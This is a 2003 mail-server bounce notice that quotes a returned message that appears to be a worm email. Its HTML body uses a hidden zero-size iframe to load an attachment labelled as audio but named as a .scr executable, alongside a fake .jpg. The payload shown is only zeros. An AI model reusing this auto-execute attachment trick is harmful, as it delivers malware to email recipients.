Subject: failure notice

From: [email-masked]
Date: 8 Jan 2003 15:50:56 -0000

Hi. This is the qmail-send program at optic.dynamicpipe.com.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<[email-masked]>:
Sorry, no mailbox here by that name. (#5.1.1)

--- Below this line is a copy of the message.

Date: Wed, 8 Jan 2003 10:41:05 -0500 (EST)
From: linux-mips <[email-masked]>
To: [email-masked]
Subject: Product.

--IUNj13u0A8R66622
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:HI9MHtdg height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

--IUNj13u0A8R66622
Content-Type: audio/x-wav;
	name=or re.scr
Content-Transfer-Encoding: base64
Content-ID: <HI9MHtdg>

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--IUNj13u0A8R66622
--IUNj13u0A8R66622
Content-Type: application/octet-stream;
	name=tour1_09[2].jpg
Content-Transfer-Encoding: base64
Content-ID: <HI9MHtdg>

--IUNj13u0A8R66622--